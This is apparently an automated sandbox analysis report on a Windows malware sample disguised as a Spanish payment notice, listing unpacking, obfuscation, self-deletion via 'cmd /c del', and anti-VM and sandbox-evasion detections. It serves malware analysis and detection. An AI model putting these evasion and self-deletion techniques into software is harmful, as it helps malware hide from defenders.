          Source: Binary string: wntdll.pdbUGP source: Notificaci#U00f3n de pago.exe, 00000008.00000002.384074601.0000000001A50000.00000040.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000008.00000002.385236446.0000000001B6F000.00000040.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000008.00000003.308300902.00000000018B3000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000008.00000003.306800992.000000000171A000.00000004.00000800.00020000.00000000.sdmp, WWAHost.exe, 0000000E.00000003.383100819.00000000035F7000.00000004.00000800.00020000.00000000.sdmp, WWAHost.exe, 0000000E.00000003.385157630.0000000003790000.00000004.00000800.00020000.00000000.sdmp, WWAHost.exe, 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp, WWAHost.exe, 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: Notificaci#U00f3n de pago.exe, 00000008.00000002.384074601.0000000001A50000.00000040.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000008.00000002.385236446.0000000001B6F000.00000040.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000008.00000003.308300902.00000000018B3000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000008.00000003.306800992.000000000171A000.00000004.00000800.00020000.00000000.sdmp, WWAHost.exe, WWAHost.exe, 0000000E.00000003.383100819.00000000035F7000.00000004.00000800.00020000.00000000.sdmp, WWAHost.exe, 0000000E.00000003.385157630.0000000003790000.00000004.00000800.00020000.00000000.sdmp, WWAHost.exe, 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp, WWAHost.exe, 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: FormatExcept.pdb source: Notificaci#U00f3n de pago.exe

          Data Obfuscation

          barindex
          .NET source code contains potential unpacker
          Source: Notificaci#U00f3n de pago.exe, Rw/FJ.cs.Net Code: Qyc System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.2.Notificaci#U00f3n de pago.exe.b90000.0.unpack, Rw/FJ.cs.Net Code: Qyc System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.0.Notificaci#U00f3n de pago.exe.b90000.0.unpack, Rw/FJ.cs.Net Code: Qyc System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 8.0.Notificaci#U00f3n de pago.exe.e10000.7.unpack, Rw/FJ.cs.Net Code: Qyc System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 8.0.Notificaci#U00f3n de pago.exe.e10000.9.unpack, Rw/FJ.cs.Net Code: Qyc System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 8.2.Notificaci#U00f3n de pago.exe.e10000.1.unpack, Rw/FJ.cs.Net Code: Qyc System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 8.0.Notificaci#U00f3n de pago.exe.e10000.3.unpack, Rw/FJ.cs.Net Code: Qyc System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 8.0.Notificaci#U00f3n de pago.exe.e10000.1.unpack, Rw/FJ.cs.Net Code: Qyc System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 8.0.Notificaci#U00f3n de pago.exe.e10000.5.unpack, Rw/FJ.cs.Net Code: Qyc System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 8.0.Notificaci#U00f3n de pago.exe.e10000.0.unpack, Rw/FJ.cs.Net Code: Qyc System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 8.0.Notificaci#U00f3n de pago.exe.e10000.2.unpack, Rw/FJ.cs.Net Code: Qyc System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          .NET source code contains method to dynamically call methods (often used by packers)
          Source: Notificaci#U00f3n de pago.exe, Rw/FJ.cs.Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "456E756D43617465676F7279496E7374616E636573466C", "7763786A4E67544675", "PagedOptionsDialog" } }, null, null)
          Source: 0.2.Notificaci#U00f3n de pago.exe.b90000.0.unpack, Rw/FJ.cs.Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "456E756D43617465676F7279496E7374616E636573466C", "7763786A4E67544675", "PagedOptionsDialog" } }, null, null)
          Source: 0.0.Notificaci#U00f3n de pago.exe.b90000.0.unpack, Rw/FJ.cs.Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "456E756D43617465676F7279496E7374616E636573466C", "7763786A4E67544675", "PagedOptionsDialog" } }, null, null)
          Source: 8.0.Notificaci#U00f3n de pago.exe.e10000.7.unpack, Rw/FJ.cs.Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "456E756D43617465676F7279496E7374616E636573466C", "7763786A4E67544675", "PagedOptionsDialog" } }, null, null)
          Source: 8.0.Notificaci#U00f3n de pago.exe.e10000.9.unpack, Rw/FJ.cs.Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "456E756D43617465676F7279496E7374616E636573466C", "7763786A4E67544675", "PagedOptionsDialog" } }, null, null)
          Source: 8.2.Notificaci#U00f3n de pago.exe.e10000.1.unpack, Rw/FJ.cs.Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "456E756D43617465676F7279496E7374616E636573466C", "7763786A4E67544675", "PagedOptionsDialog" } }, null, null)
          Source: 8.0.Notificaci#U00f3n de pago.exe.e10000.3.unpack, Rw/FJ.cs.Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "456E756D43617465676F7279496E7374616E636573466C", "7763786A4E67544675", "PagedOptionsDialog" } }, null, null)
          Source: 8.0.Notificaci#U00f3n de pago.exe.e10000.1.unpack, Rw/FJ.cs.Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "456E756D43617465676F7279496E7374616E636573466C", "7763786A4E67544675", "PagedOptionsDialog" } }, null, null)
          Source: 8.0.Notificaci#U00f3n de pago.exe.e10000.5.unpack, Rw/FJ.cs.Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "456E756D43617465676F7279496E7374616E636573466C", "7763786A4E67544675", "PagedOptionsDialog" } }, null, null)
          Source: 8.0.Notificaci#U00f3n de pago.exe.e10000.0.unpack, Rw/FJ.cs.Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "456E756D43617465676F7279496E7374616E636573466C", "7763786A4E67544675", "PagedOptionsDialog" } }, null, null)
          Source: 8.0.Notificaci#U00f3n de pago.exe.e10000.2.unpack, Rw/FJ.cs.Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "456E756D43617465676F7279496E7374616E636573466C", "7763786A4E67544675", "PagedOptionsDialog" } }, null, null)
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 0_2_00B98EDF push ss; retf
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 8_2_0041A082 push 01F04D8Ch; iretd
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 8_2_00416D1E push ds; retf
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 8_2_00416DE0 push es; iretd
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 8_2_0041D662 push eax; ret
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 8_2_0041D66B push eax; ret
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 8_2_0041D615 push eax; ret
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 8_2_0041D6CC push eax; ret
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 8_2_0041E773 push ecx; ret
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 8_2_00E18EDF push ss; retf
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039AD0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_00A7A082 push 01F04D8Ch; iretd
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_00A76DE0 push es; iretd
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_00A76D1E push ds; retf
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_00A7D6CC push eax; ret
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_00A7D615 push eax; ret
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_00A7D662 push eax; ret
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_00A7D66B push eax; ret
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_00A7E773 push ecx; ret
          Source: initial sampleStatic PE information: section name: .text entropy: 7.92135270708
          Source: Notificaci#U00f3n de pago.exe, Rw/Yt.csHigh entropy of concatenated method names: 'az', 'Jys', 'pyd', 'hyI', '.ctor', 'pR', 'xT', 'sq', 'd3', 'G9'
          Source: 0.2.Notificaci#U00f3n de pago.exe.b90000.0.unpack, Rw/Yt.csHigh entropy of concatenated method names: 'az', 'Jys', 'pyd', 'hyI', '.ctor', 'pR', 'xT', 'sq', 'd3', 'G9'
          Source: 0.0.Notificaci#U00f3n de pago.exe.b90000.0.unpack, Rw/Yt.csHigh entropy of concatenated method names: 'az', 'Jys', 'pyd', 'hyI', '.ctor', 'pR', 'xT', 'sq', 'd3', 'G9'
          Source: 8.0.Notificaci#U00f3n de pago.exe.e10000.7.unpack, Rw/Yt.csHigh entropy of concatenated method names: 'az', 'Jys', 'pyd', 'hyI', '.ctor', 'pR', 'xT', 'sq', 'd3', 'G9'
          Source: 8.0.Notificaci#U00f3n de pago.exe.e10000.9.unpack, Rw/Yt.csHigh entropy of concatenated method names: 'az', 'Jys', 'pyd', 'hyI', '.ctor', 'pR', 'xT', 'sq', 'd3', 'G9'
          Source: 8.2.Notificaci#U00f3n de pago.exe.e10000.1.unpack, Rw/Yt.csHigh entropy of concatenated method names: 'az', 'Jys', 'pyd', 'hyI', '.ctor', 'pR', 'xT', 'sq', 'd3', 'G9'
          Source: 8.0.Notificaci#U00f3n de pago.exe.e10000.3.unpack, Rw/Yt.csHigh entropy of concatenated method names: 'az', 'Jys', 'pyd', 'hyI', '.ctor', 'pR', 'xT', 'sq', 'd3', 'G9'
          Source: 8.0.Notificaci#U00f3n de pago.exe.e10000.1.unpack, Rw/Yt.csHigh entropy of concatenated method names: 'az', 'Jys', 'pyd', 'hyI', '.ctor', 'pR', 'xT', 'sq', 'd3', 'G9'
          Source: 8.0.Notificaci#U00f3n de pago.exe.e10000.5.unpack, Rw/Yt.csHigh entropy of concatenated method names: 'az', 'Jys', 'pyd', 'hyI', '.ctor', 'pR', 'xT', 'sq', 'd3', 'G9'
          Source: 8.0.Notificaci#U00f3n de pago.exe.e10000.0.unpack, Rw/Yt.csHigh entropy of concatenated method names: 'az', 'Jys', 'pyd', 'hyI', '.ctor', 'pR', 'xT', 'sq', 'd3', 'G9'
          Source: 8.0.Notificaci#U00f3n de pago.exe.e10000.2.unpack, Rw/Yt.csHigh entropy of concatenated method names: 'az', 'Jys', 'pyd', 'hyI', '.ctor', 'pR', 'xT', 'sq', 'd3', 'G9'

          Hooking and other Techniques for Hiding and Protection

          barindex
          Self deletion via cmd delete
          Source: C:\Windows\SysWOW64\WWAHost.exeProcess created: /c del "C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe"
          Source: C:\Windows\SysWOW64\WWAHost.exeProcess created: /c del "C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe"
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WWAHost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          barindex
          Yara detected AntiVM3
          Source: Yara matchFile source: 00000000.00000002.310331717.0000000002FB8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.310059804.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: Notificaci#U00f3n de pago.exe PID: 6360, type: MEMORYSTR
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000002.310331717.0000000002FB8000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000002.310059804.0000000002F31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000002.310331717.0000000002FB8000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000002.310059804.0000000002F31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeRDTSC instruction interceptor: First address: 0000000000408C04 second address: 0000000000408C0A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeRDTSC instruction interceptor: First address: 0000000000408F8E second address: 0000000000408F94 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\WWAHost.exeRDTSC instruction interceptor: First address: 0000000000A68C04 second address: 0000000000A68C0A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\WWAHost.exeRDTSC instruction interceptor: First address: 0000000000A68F8E second address: 0000000000A68F94 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe TID: 6364Thread sleep time: -45733s >= -30000s
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe TID: 6448Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\WWAHost.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 8_2_00408EC0 rdtsc
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WWAHost.exeAPI coverage: 9.4 %
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeThread delayed: delay time: 45733
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeThread delayed: delay time: 922337203685477
          Source: explorer.exe, 0000000B.00000000.323171776.00000000080ED000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 0000000B.00000000.367419056.0000000008223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}m&ven_n
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000002.310059804.0000000002F31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 0000000B.00000000.429366333.0000000000680000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _VMware_SATA_CD00#5&280b647&
          Source: explorer.exe, 0000000B.00000000.340384303.000000000069D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000002.310059804.0000000002F31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
          Source: explorer.exe, 0000000B.00000000.367419056.0000000008223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 0000000B.00000000.435360812.00000000062C4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 0000000B.00000000.367419056.0000000008223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}+]e
          Source: explorer.exe, 0000000B.00000000.360151542.0000000004287000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0
          Source: explorer.exe, 0000000B.00000000.367419056.0000000008223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}}^
          Source: explorer.exe, 0000000B.00000000.323914419.000000000820E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000002.310059804.0000000002F31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
          Source: explorer.exe, 0000000B.00000000.323171776.00000000080ED000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 0000000B.00000000.367419056.0000000008223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00l
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000002.310059804.0000000002F31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 8_2_00408EC0 rdtsc
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A25BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0398B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03982397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03961B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03961B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A0D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A1138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03984BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03984BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03984BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039D53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039D53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039803E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039803E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039803E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039803E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039803E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039803E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0397DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A1131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0395F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0395DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03983B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03983B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0395DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A28B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0398D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0398D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0396AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0396AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0398FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039552A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039552A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039552A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039552A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039552A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03982ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03982AE4 mov eax, dword ptr fs:[00000030h]
